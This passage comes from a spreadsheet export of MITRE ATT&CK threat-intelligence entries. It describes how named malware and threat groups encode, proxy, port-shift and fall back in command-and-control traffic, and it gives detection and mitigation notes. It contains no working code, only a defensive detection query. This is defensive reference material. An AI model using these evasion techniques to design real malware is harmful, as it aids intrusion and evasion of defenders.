[Emotet](https://attack.mitre.org/software/S0367) has used Google’s Protobufs to serialize data sent to and from the C2 server.(Citation: Binary Defense Emotes Wi-Fi Spreader)
Felismus
Some [Felismus](https://attack.mitre.org/software/S0171) samples use a custom method for C2 traffic that utilizes Base64.(Citation: Forcepoint Felismus Mar 2017)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) has encoded bidirectional data communications between a target system and C2 server using Base64.(Citation: NTT Security Flagpro new December 2021) 
Fysbis
[Fysbis](https://attack.mitre.org/software/S0410) can use Base64 to encode its C2 traffic.(Citation: Fysbis Dr Web Analysis)
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) can base64 encode C2 replies.(Citation: Group IB GrimAgent July 2021)
HOPLIGHT
[HOPLIGHT](https://attack.mitre.org/software/S0376) has utilized Zlib compression to obfuscate the communications payload. (Citation: US-CERT HOPLIGHT Apr 2019)	
Helminth
For C2 over HTTP, [Helminth](https://attack.mitre.org/software/S0170) encodes data with base64 and sends it via the "Cookie" field of HTTP requests. For C2 over DNS, [Helminth](https://attack.mitre.org/software/S0170) converts ASCII characters into their hexadecimal values and sends the data in cleartext.(Citation: Palo Alto OilRig May 2016)
Ixeshe
[Ixeshe](https://attack.mitre.org/software/S0015) uses custom Base64 encoding schemes to obfuscate command and control traffic in the message body of HTTP requests.(Citation: Moran 2013)(Citation: Trend Micro IXESHE 2012)
JHUHUGIT
A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant encodes C2 POST data base64.(Citation: Unit 42 Playbook Dec 2017)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has used a custom base64 key to encode stolen data before exfiltration.(Citation: Medium KONNI Jan 2020)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) encodes communications to the C2 server in Base64.(Citation: Unit 42 Kazuar May 2017)
Kessel
[Kessel](https://attack.mitre.org/software/S0487) has exfiltrated data via hexadecimal-encoded subdomain fields of DNS queries.(Citation: ESET ForSSHe December 2018)
Kevin
[Kevin](https://attack.mitre.org/software/S1020) can Base32 encode chunks of output files during exfiltration.(Citation: Kaspersky Lyceum October 2021)
Machete
[Machete](https://attack.mitre.org/software/S0409) has used base64 encoding.(Citation: Securelist Machete Aug 2014)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can encode data using Base64 prior to exfiltration.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
MechaFlounder
[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to use base16 encoded strings in C2.(Citation: Unit 42 MechaFlounder March 2019)
Mis-Type
[Mis-Type](https://attack.mitre.org/software/S0084) uses Base64 encoding for C2 traffic.(Citation: Cylance Dust Storm)
Misdat
[Misdat](https://attack.mitre.org/software/S0083) network traffic is Base64-encoded plaintext.(Citation: Cylance Dust Storm)
Mongall
[Mongall](https://attack.mitre.org/software/S1026) can use Base64 to encode information sent to its C2.(Citation: SentinelOne Aoqin Dragon June 2022)
More_eggs
[More_eggs](https://attack.mitre.org/software/S0284) has used basE91 encoding, along with encryption, for C2 communication.(Citation: Security Intelligence More Eggs Aug 2019)
Mori
[Mori](https://attack.mitre.org/software/S1047) can use Base64 encoded JSON libraries used in C2.(Citation: DHS CISA AA22-055A MuddyWater February 2022)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has used `zlib` to compress all data after 0x52 for the custom TCP C2 protocol.(Citation: Unit42 OceanLotus 2017)
Octopus
[Octopus](https://attack.mitre.org/software/S0340) has encoded C2 communications in Base64.(Citation: Securelist Octopus Oct 2018)
Okrum
[Okrum](https://attack.mitre.org/software/S0439) has used base64 to encode C2 communication.(Citation: ESET Okrum July 2019)
OopsIE
[OopsIE](https://attack.mitre.org/software/S0264) encodes data in hexadecimal format over the C2 channel.(Citation: Unit 42 OopsIE! Feb 2018)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) encoded C2 traffic with base64.(Citation: Unit 42 MuddyWater Nov 2017)
POWRUNER
[POWRUNER](https://attack.mitre.org/software/S0184) can use base64 encoded C2 communications.(Citation: FireEye APT34 Dec 2017)
PingPull
[PingPull](https://attack.mitre.org/software/S1031) can encode C2 traffic with Base64.(Citation: Unit 42 PingPull Jun 2022)
Pisloader
Responses from the [Pisloader](https://attack.mitre.org/software/S0124) C2 server are base32-encoded.(Citation: Palo Alto DNS Requests)
PowerShower
[PowerShower](https://attack.mitre.org/software/S0441) has the ability to encode C2 communications with base64 encoding.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)
Prikormka
[Prikormka](https://attack.mitre.org/software/S0113) encodes C2 traffic with Base64.(Citation: ESET Operation Groundbait)
QUADAGENT
[QUADAGENT](https://attack.mitre.org/software/S0269) encodes C2 communications with base64.(Citation: Unit 42 QUADAGENT July 2018)
QUIETCANARY
[QUIETCANARY](https://attack.mitre.org/software/S1076) can base64 encode C2 communications.(Citation: Mandiant Suspected Turla Campaign February 2023)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can Base64 encode system information sent to C2.(Citation: Crowdstrike Qakbot October 2020)(Citation: Kaspersky QakBot September 2021)
RDAT
[RDAT](https://attack.mitre.org/software/S0495) can communicate with the C2 via base32-encoded subdomains.(Citation: Unit42 RDAT July 2020)	
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) has used base64 to encode its C2 traffic.(Citation: Antiy CERT Ramsay April 2020)
Revenge RAT
[Revenge RAT](https://attack.mitre.org/software/S0379) uses Base64 to encode information sent to the C2 server.(Citation: Cylance Shaheen Nov 2018)
RogueRobin
[RogueRobin](https://attack.mitre.org/software/S0270) base64 encodes strings that are sent to the C2 over its DNS tunnel.(Citation: Unit 42 DarkHydrus July 2018)
RotaJakiro
[RotaJakiro](https://attack.mitre.org/software/S1078) uses ZLIB Compression to compresses data sent to the C2 server in the `payload` section network communication packet.(Citation: RotaJakiro 2021 netlab360 analysis)
S-Type
[S-Type](https://attack.mitre.org/software/S0085) uses Base64 encoding for C2 traffic.(Citation: Cylance Dust Storm)
SMOKEDHAM
[SMOKEDHAM](https://attack.mitre.org/software/S0649) has encoded its C2 traffic with Base64.(Citation: FireEye SMOKEDHAM June 2021)
STARWHALE
[STARWHALE](https://attack.mitre.org/software/S1037) has the ability to hex-encode collected data from an infected host.(Citation: DHS CISA AA22-055A MuddyWater February 2022)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) used Base64 encoding in its C2 traffic.(Citation: FireEye SUNBURST Backdoor December 2020)
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) has used Base64 to encode its C2 communications.(Citation: Malwarebytes Saint Bot April 2021)
Sardonic
[Sardonic](https://attack.mitre.org/software/S1085) can encode client ID data in 32 uppercase hex characters and transfer to the actor-controlled C2 server.(Citation: Bitdefender Sardonic Aug 2021)
SeaDuke
[SeaDuke](https://attack.mitre.org/software/S0053) C2 traffic is base64-encoded.(Citation: Unit 42 SeaDuke 2015)
SideTwist
[SideTwist](https://attack.mitre.org/software/S0610) has used Base64 for encoded C2 traffic.(Citation: Check Point APT34 April 2021)
Sliver
[Sliver](https://attack.mitre.org/software/S0633) can use standard encoding techniques like gzip and hex to ASCII to encode the C2 communication payload.(Citation: GitHub Sliver HTTP)
Spark
[Spark](https://attack.mitre.org/software/S0543) has encoded communications with the C2 server with base64.(Citation: Unit42 Molerat Mar 2020) 
SpeakUp
[SpeakUp](https://attack.mitre.org/software/S0374) encodes C&amp;C communication using Base64. (Citation: CheckPoint SpeakUp Feb 2019)
Squirrelwaffle
[Squirrelwaffle](https://attack.mitre.org/software/S1030) has encoded its communications to C2 servers using Base64.(Citation: ZScaler Squirrelwaffle Sep 2021)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) transforms encrypted binary data into an ASCII string in order to use it as a URL parameter value.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
SysUpdate
[SysUpdate](https://attack.mitre.org/software/S0663) has used Base64 to encode its C2 traffic.(Citation: Lunghi Iron Tiger Linux) 
Torisma
[Torisma](https://attack.mitre.org/software/S0678) has encoded C2 communications with Base64.(Citation: McAfee Lazarus Nov 2020)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) can Base64-encode C2 commands.(Citation: Cyberreason Anchor December 2019)
Valak
[Valak](https://attack.mitre.org/software/S0476) has returned C2 data as encoded ASCII.(Citation: Unit 42 Valak July 2020)
WellMess
[WellMess](https://attack.mitre.org/software/S0514) has used Base64 encoding to uniquely identify communication to and from the C2.(Citation: CISA WellMess July 2020)
Zebrocy
[Zebrocy](https://attack.mitre.org/software/S0251) has used URL/Percent Encoding on data exfiltrated via HTTP POST requests.(Citation: Accenture SNAKEMACKEREL Nov 2018)
down_new
[down_new](https://attack.mitre.org/software/S0472) has the ability to base64 encode C2 communications.(Citation: Trend Micro Tick November 2019)
gh0st RAT
[gh0st RAT](https://attack.mitre.org/software/S0032) has used Zlib to compress C2 communications data before encrypting it.(Citation: Gh0stRAT ATT March 2019)
njRAT
[njRAT](https://attack.mitre.org/software/S0385) uses Base64 encoding for C2 traffic.(Citation: Fidelis njRAT June 2013)
xCaon
[xCaon](https://attack.mitre.org/software/S0653) has used Base64 to encode its C2 traffic.(Citation: Checkpoint IndigoZebra July 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.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Filter Network Traffic
Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network allow and block lists. It should be noted that this kind of blocking may be circumvented by other techniques like [Domain Fronting](https://attack.mitre.org/techniques/T1090/004).
CostaRicto
During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors used a layer of proxies to manage C2 communications.(Citation: BlackBerry CostaRicto November 2020) 
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors executed commands through the installed web shell via [Tor](https://attack.mitre.org/software/S0183) exit nodes.(Citation: FoxIT Wocao December 2019)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has routed traffic over [Tor](https://attack.mitre.org/software/S0183) and VPN servers to obfuscate their activities.(Citation: TrendMicro Pawn Storm Dec 2020)
APT29
A backdoor used by [APT29](https://attack.mitre.org/groups/G0016) created a [Tor](https://attack.mitre.org/software/S0183) hidden service to forward traffic from the [Tor](https://attack.mitre.org/software/S0183) client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network and has also used TOR.(Citation: Mandiant No Easy Breach)(Citation: MSTIC Nobelium Oct 2021)
FIN4
[FIN4](https://attack.mitre.org/groups/G0085) has used Tor to log in to victims' email accounts.(Citation: FireEye Hacking FIN4 Dec 2014)
Inception
[Inception](https://attack.mitre.org/groups/G0100) used chains of compromised routers to proxy C2 communications between them and cloud service providers.(Citation: Symantec Inception Framework March 2018)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has used multi-hop proxies to disguise the source of their malicious traffic.(Citation: CISA AA21-200A APT40 July 2021)
Attor
[Attor](https://attack.mitre.org/software/S0438) has used Tor for C2 communication.(Citation: ESET Attor Oct 2019)
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) has used [Tor](https://attack.mitre.org/software/S0183) nodes for C2 traffic.(Citation: NCSC CISA Cyclops Blink Advisory February 2022)
Dok
[Dok](https://attack.mitre.org/software/S0281) downloads and installs [Tor](https://attack.mitre.org/software/S0183) via homebrew.(Citation: objsee mac malware 2017)
Dridex
[Dridex](https://attack.mitre.org/software/S0384) can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.(Citation: Checkpoint Dridex Jan 2021)
GreyEnergy
[GreyEnergy](https://attack.mitre.org/software/S0342) has used Tor relays for Command and Control servers.(Citation: ESET GreyEnergy Oct 2018)
Industroyer
[Industroyer](https://attack.mitre.org/software/S0604) used [Tor](https://attack.mitre.org/software/S0183) nodes for C2.(Citation: Dragos Crashoverride 2017)
Keydnap
[Keydnap](https://attack.mitre.org/software/S0276) uses a copy of tor2web proxy for HTTPS communications.(Citation: synack 2016 review)
Kobalos
[Kobalos](https://attack.mitre.org/software/S0641) can chain together multiple compromised machines as proxies to reach their final targets.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021)
MacSpy
[MacSpy](https://attack.mitre.org/software/S0282) uses Tor for command and control.(Citation: objsee mac malware 2017)
Siloscape
[Siloscape](https://attack.mitre.org/software/S0623) uses Tor to communicate with C2.(Citation: Unit 42 Siloscape Jun 2021)
StrongPity
[StrongPity](https://attack.mitre.org/software/S0491) can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.(Citation: Bitdefender StrongPity June 2020)
Tor
Traffic traversing the [Tor](https://attack.mitre.org/software/S0183) network will be forwarded to multiple nodes before exiting the [Tor](https://attack.mitre.org/software/S0183) network and continuing on to its intended destination.(Citation: Dingledine Tor The Second-Generation Onion Router)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) can use implants on multiple compromised machines to proxy communications through its worldwide P2P network.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) has used [Tor](https://attack.mitre.org/software/S0183) for C2.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016)
WannaCry
[WannaCry](https://attack.mitre.org/software/S0366) uses [Tor](https://attack.mitre.org/software/S0183) for command and control traffic.(Citation: SecureWorks WannaCry Analysis)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.
Network Traffic Flow
Monitor network data flows for unexpected patterns and metadata that may be indicative of a mismatch between protocol and utilized port.
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.
Network Segmentation
Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports for that particular network segment.
C0018
During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors opened a variety of ports, including ports 28035, 32467, 41578, and 46892, to establish RDP connections.(Citation: Costa AvosLocker May 2022)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors used uncommon high ports for its backdoor C2, including ports 25667 and 47000.(Citation: FoxIT Wocao December 2019)
APT-C-36
[APT-C-36](https://attack.mitre.org/groups/G0099) has used port 4050 for C2 communications.(Citation: QiAnXin APT-C-36 Feb2019)
APT32
An [APT32](https://attack.mitre.org/groups/G0050) backdoor can use HTTP over a non-standard TCP port (e.g 14146) which is specified in the backdoor configuration.(Citation: ESET OceanLotus Mar 2019)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used HTTP over TCP ports 808 and 880 for command and control.(Citation: Symantec Elfin Mar 2019)
DarkVishnya
[DarkVishnya](https://attack.mitre.org/groups/G0105) used ports 5190 and 7900 for shellcode listeners, and 4444, 4445, 31337 for shellcode C2.(Citation: Securelist DarkVishnya Dec 2018)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has used port-protocol mismatches on ports such as 53, 80, 443, and 8080 during C2.(Citation: FireEye FIN7 Aug 2018)
Lazarus Group
Some [Lazarus Group](https://attack.mitre.org/groups/G0032) malware uses a list of ordered port numbers to choose a port for C2 traffic, creating port-protocol mismatches.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) malware has communicated with its C2 server over TCP ports 4443 and 10151 using HTTP.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Phosphorus November 2021)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106)'s miner connects to a C2 server using port 51640.(Citation: Anomali Rocke March 2019)	
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used port 6789 to accept connections on the group's SSH server.(Citation: ESET BlackEnergy Jan 2016)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has used port 444 when sending data about the system from the client to the server.(Citation: Group IB Silence Sept 2018)	
TEMP.Veles
[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used port-protocol mismatches on ports such as 443, 4444, 8531, and 50501 during C2.(Citation: FireEye TRITON 2019)
WIRTE
[WIRTE](https://attack.mitre.org/groups/G0090) has used HTTPS over ports 2083 and 2087 for C2.(Citation: Kaspersky WIRTE November 2021)
BADCALL
[BADCALL](https://attack.mitre.org/software/S0245) communicates on ports 443 and 8000 with a FakeTLS method.(Citation: US-CERT BADCALL)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.(Citation: US-CERT Bankshot Dec 2017)
BendyBear
[BendyBear](https://attack.mitre.org/software/S0574) has used a custom RC4 and XOR encrypted protocol over port 443 for C2.(Citation: Unit42 BendyBear Feb 2021)
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) can use non-standard ports for C2 not typically associated with HTTP or HTTPS traffic.(Citation: NCSC Cyclops Blink February 2022)
Derusbi
[Derusbi](https://attack.mitre.org/software/S0021) has used unencrypted HTTP on port 443 for C2.(Citation: Fidelis Turbo)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has used HTTP over ports such as 20, 22, 443, 7080, and 50000, in addition to using ports commonly associated with HTTP/S.(Citation: Talos Emotet Jan 2019)(Citation: Binary Defense Emotes Wi-Fi Spreader)
GoldenSpy
[GoldenSpy](https://attack.mitre.org/software/S0493) has used HTTP over ports 9005 and 9006 for network traffic, 9002 for C2 requests, 33666 as a WebSocket, and 8090 to download files.(Citation: Trustwave GoldenSpy June 2020)
GravityRAT
[GravityRAT](https://attack.mitre.org/software/S0237) has used HTTP over a non-standard port, such as TCP port 46769.(Citation: Talos GravityRAT)
HARDRAIN
[HARDRAIN](https://attack.mitre.org/software/S0246) binds and listens on port 443 with a FakeTLS method.(Citation: US-CERT HARDRAIN March 2018)
HOPLIGHT
[HOPLIGHT](https://attack.mitre.org/software/S0376) has connected outbound over TCP port 443 with a FakeTLS method.(Citation: US-CERT HOPLIGHT Apr 2019)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) has used TCP port 5633 for C2 Communication.(Citation: ESET DazzleSpy Jan 2022)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has communicated with hosts over raw TCP on port 9999.(Citation: FireEye Metamorfo Apr 2018) 
MoonWind
[MoonWind](https://attack.mitre.org/software/S0149) communicates over ports 80, 443, 53, and 8080 via raw sockets instead of the protocols usually associated with the ports.(Citation: Palo Alto MoonWind March 2017)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has used a custom binary protocol over TCP port 443 for C2.(Citation: Unit42 OceanLotus 2017)
PingPull
[PingPull](https://attack.mitre.org/software/S1031) can use HTTPS over port 8080 for C2.(Citation: Unit 42 PingPull Jun 2022)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) used TLS to encrypt communications over port 143(Citation: Talos PoetRAT April 2020)
QuasarRAT
[QuasarRAT](https://attack.mitre.org/software/S0262) can use port 4782 on the compromised host for TCP callbacks.(Citation: CISA AR18-352A Quasar RAT December 2018)
RTM
[RTM](https://attack.mitre.org/software/S0148) used Port 44443 for its VNC module.(Citation: ESET RTM Feb 2017)
RedLeaves
[RedLeaves](https://attack.mitre.org/software/S0153) can use HTTP over non-standard ports, such as 995, for C2.(Citation: PWC Cloud Hopper Technical Annex April 2017)
RotaJakiro
[RotaJakiro](https://attack.mitre.org/software/S1078) uses a custom binary protocol over TCP port 443.(Citation: netlab360 rotajakiro vs oceanlotus)
SUGARUSH
[SUGARUSH](https://attack.mitre.org/software/S1049) has used port 4585 for a TCP connection to its C2.(Citation: Mandiant UNC3890 Aug 2022)
Sardonic
[Sardonic](https://attack.mitre.org/software/S1085) has the ability to connect with actor-controlled C2 servers using a custom binary protocol over port 443.(Citation: Bitdefender Sardonic Aug 2021)
StrongPity
[StrongPity](https://attack.mitre.org/software/S0491) has used HTTPS over port 1402 in C2 communication.(Citation: Bitdefender StrongPity June 2020)
TYPEFRAME
[TYPEFRAME](https://attack.mitre.org/software/S0263) has used ports 443, 8080, and 8443 with a FakeTLS method.(Citation: US-CERT TYPEFRAME June 2018)
TrickBot
Some [TrickBot](https://attack.mitre.org/software/S0266) samples have used HTTP over ports 447 and 8082 for C2.(Citation: S2 Grupo TrickBot June 2017)(Citation: Fidelis TrickBot Oct 2016)(Citation: Trend Micro Totbrick Oct 2016) Newer versions of [TrickBot](https://attack.mitre.org/software/S0266) have been known to use a custom communication protocol which sends the data unencrypted over port 443. (Citation: Bitdefender Trickbot VNC module Whitepaper 2021)
WellMail
[WellMail](https://attack.mitre.org/software/S0515) has been observed using TCP port 25, without using SMTP, to leverage an open port for secure command and control communications.(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) can use ports 1985 and 1986 in HTTP/S communication.(Citation: Talos ZxShell Oct 2014)
njRAT
[njRAT](https://attack.mitre.org/software/S0385) has used port 1177 for HTTP C2 communications.(Citation: Trend Micro njRAT 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.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Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.
Restrict Web-Based Content
Web proxies can be used to enforce external network communication policy that prevents use of unauthorized external services.
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet.(Citation: FireEye Periscope March 2018)
EVILNUM
[EVILNUM](https://attack.mitre.org/software/S0568) has used a one-way communication method via GitLab and Digital Point to perform C2.(Citation: Prevailion EvilNum May 2020)
HAMMERTOSS
The "tDiscoverer" variant of [HAMMERTOSS](https://attack.mitre.org/software/S0037) establishes a C2 channel by downloading resources from Web services like Twitter and GitHub. [HAMMERTOSS](https://attack.mitre.org/software/S0037) binaries contain an algorithm that generates a different Twitter handle for the malware to check for instructions every day.(Citation: FireEye APT29)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has downloaded a zip file for execution on the system.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020) 
OnionDuke
[OnionDuke](https://attack.mitre.org/software/S0052) uses Twitter as a backup C2.(Citation: F-Secure The Dukes)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds. Processes utilizing the network that do not normally have network communication or have never been seen before may be suspicious.
Note: Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on TCP network connection creation. The below analytic is using an event ID from OSQuery. 
&lt;h4&gt;Analytic 1 - Windows Process Network Connection &lt;/h4&gt;
&lt;code&gt;netcon_from_sysproc = filter process_open_sockets where remote_port != 0 AND proc_name!= '';"&lt;/code&gt;
Network Traffic Flow
Monitor network data for uncommon data flows, such as unexpected surges or other abnormal inbound/outbound patterns.
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used company extranet servers as secondary C2 servers.(Citation: McAfee Night Dragon)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used the Steam community page as a fallback mechanism for C2.(Citation: FireEye APT41 Aug 2019) 
FIN7
[FIN7](https://attack.mitre.org/groups/G0046)'s Harpy backdoor malware can use DNS as a backup channel for C2 if HTTP fails.(Citation: Crowdstrike GTR2020 Mar 2020)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware SierraAlfa sends data to one of the hard-coded C2 servers chosen at random, and if the transmission fails, chooses a new C2 server to attempt the transmission again.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) malware ISMAgent falls back to its DNS tunneling mechanism if it is unable to reach the C2 server over HTTP.(Citation: OilRig ISMAgent July 2017)
Anchor
[Anchor](https://attack.mitre.org/software/S0504) can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.(Citation: Cyberreason Anchor December 2019)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) can use a second channel for C2 when the primary channel is in upload mode.(Citation: Malwarebytes Kimsuky June 2021)
BISCUIT
[BISCUIT](https://attack.mitre.org/software/S0017) malware contains a secondary fallback command and control server that is contacted after the primary command and control server.(Citation: Mandiant APT1)(Citation: Mandiant APT1 Appendix)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) has the ability to use an alternative C2 server if the primary server fails.(Citation: NCC Group Team9 June 2020)
BlackEnergy
[BlackEnergy](https://attack.mitre.org/software/S0089) has the capability to communicate over a backup channel via plus.google.com.(Citation: Securelist BlackEnergy Nov 2014)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can use backup C2 servers if the primary server fails.(Citation: Proofpoint Bumblebee April 2022)
CHOPSTICK
[CHOPSTICK](https://attack.mitre.org/software/S0023) can switch to a new C2 channel if the current one is broken.(Citation: ESET Sednit Part 2)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) can communicate over multiple C2 host and port combinations.(Citation: PaloAlto CardinalRat Apr 2017)
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) can change its C2 channel once every 360 loops by retrieving a new domain from the actors’ S3 bucket.(Citation: Check Point APT35 CharmPower January 2022)
Crutch
[Crutch](https://attack.mitre.org/software/S0538) has used a hardcoded GitHub repository as a fallback channel.(Citation: ESET Crutch December 2020)
Derusbi
[Derusbi](https://attack.mitre.org/software/S0021) uses a backup communication method with an HTTP beacon.(Citation: Fidelis Turbo)
DustySky
[DustySky](https://attack.mitre.org/software/S0062) has two hard-coded domains for C2 servers; if the first does not respond, it will try the second.(Citation: DustySky)
Ebury
[Ebury](https://attack.mitre.org/software/S0377) has implemented a fallback mechanism to begin using a DGA when the attacker hasn't connected to the infected system for three days.(Citation: ESET Ebury Oct 2017)
Exaramel for Linux
[Exaramel for Linux](https://attack.mitre.org/software/S0401) can attempt to find a new C2 server if it receives an error.(Citation: ANSSI Sandworm January 2021)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) has used several C2 servers per targeted organization.(Citation: ESET Dukes October 2019)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can use multiple domains and protocols in C2.(Citation: ESET Gelsemium June 2021)
HOPLIGHT
[HOPLIGHT](https://attack.mitre.org/software/S0376) has multiple C2 channels in place in case one fails.(Citation: US-CERT HOPLIGHT Apr 2019)	
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) has been configured with several servers available for alternate C2 communications.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
JHUHUGIT
[JHUHUGIT](https://attack.mitre.org/software/S0044) tests if it can reach its C2 server by first attempting a direct connection, and if it fails, obtaining proxy settings and sending the connection through a proxy, and finally injecting code into a running browser if the proxy method fails.(Citation: ESET Sednit Part 1)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) can accept multiple URLs for C2 servers.(Citation: Unit 42 Kazuar May 2017)
Kevin
[Kevin](https://attack.mitre.org/software/S1020) can assign hard-coded fallback domains for C2.(Citation: Kaspersky Lyceum October 2021)
Kwampirs
[Kwampirs](https://attack.mitre.org/software/S0236) uses a large list of C2 servers that it cycles through until a successful connection is established.(Citation: Symantec Orangeworm April 2018)
Linfo
[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can change C2 servers.(Citation: Symantec Linfo May 2012)
Machete
[Machete](https://attack.mitre.org/software/S0409) has sent data over HTTP if FTP failed, and has also used a fallback server.(Citation: ESET Machete July 2019) 
MiniDuke
[MiniDuke](https://attack.mitre.org/software/S0051) uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working.(Citation: Securelist MiniDuke Feb 2013)
Mis-Type
[Mis-Type](https://attack.mitre.org/software/S0084) first attempts to use a Base64-encoded network protocol over a raw TCP socket for C2, and if that method fails, falls back to a secondary HTTP-based protocol to communicate to an alternate C2 server.(Citation: Cylance Dust Storm)
Mythic
[Mythic](https://attack.mitre.org/software/S0699) can use a list of C2 URLs as fallback mechanisms in case one IP or domain gets blocked.(Citation: Mythc Documentation)	
NETEAGLE
[NETEAGLE](https://attack.mitre.org/software/S0034) will attempt to detect if the infected host is configured to a proxy. If so, [NETEAGLE](https://attack.mitre.org/software/S0034) will send beacons via an HTTP POST request; otherwise it will send beacons via UDP/6000.(Citation: FireEye APT30)
PipeMon
[PipeMon](https://attack.mitre.org/software/S0501) can switch to an alternate C2 domain when a particular date has been reached.(Citation: ESET PipeMon May 2020)
QUADAGENT
[QUADAGENT](https://attack.mitre.org/software/S0269) uses multiple protocols (HTTPS, HTTP, DNS) for its C2 server as fallback channels if communication with one is unsuccessful.(Citation: Unit 42 QUADAGENT July 2018)
QUIETEXIT
[QUIETEXIT](https://attack.mitre.org/software/S1084) can attempt to connect to a second hard-coded C2 if the first hard-coded C2 address fails.(Citation: Mandiant APT29 Eye Spy Email Nov 22)
RDAT
[RDAT](https://attack.mitre.org/software/S0495) has used HTTP if DNS C2 communications were not functioning.(Citation: Unit42 RDAT July 2020)	
RainyDay
[RainyDay](https://attack.mitre.org/software/S0629) has the ability to switch between TCP and HTTP for C2 if one method is not working.(Citation: Bitdefender Naikon April 2021)
S-Type
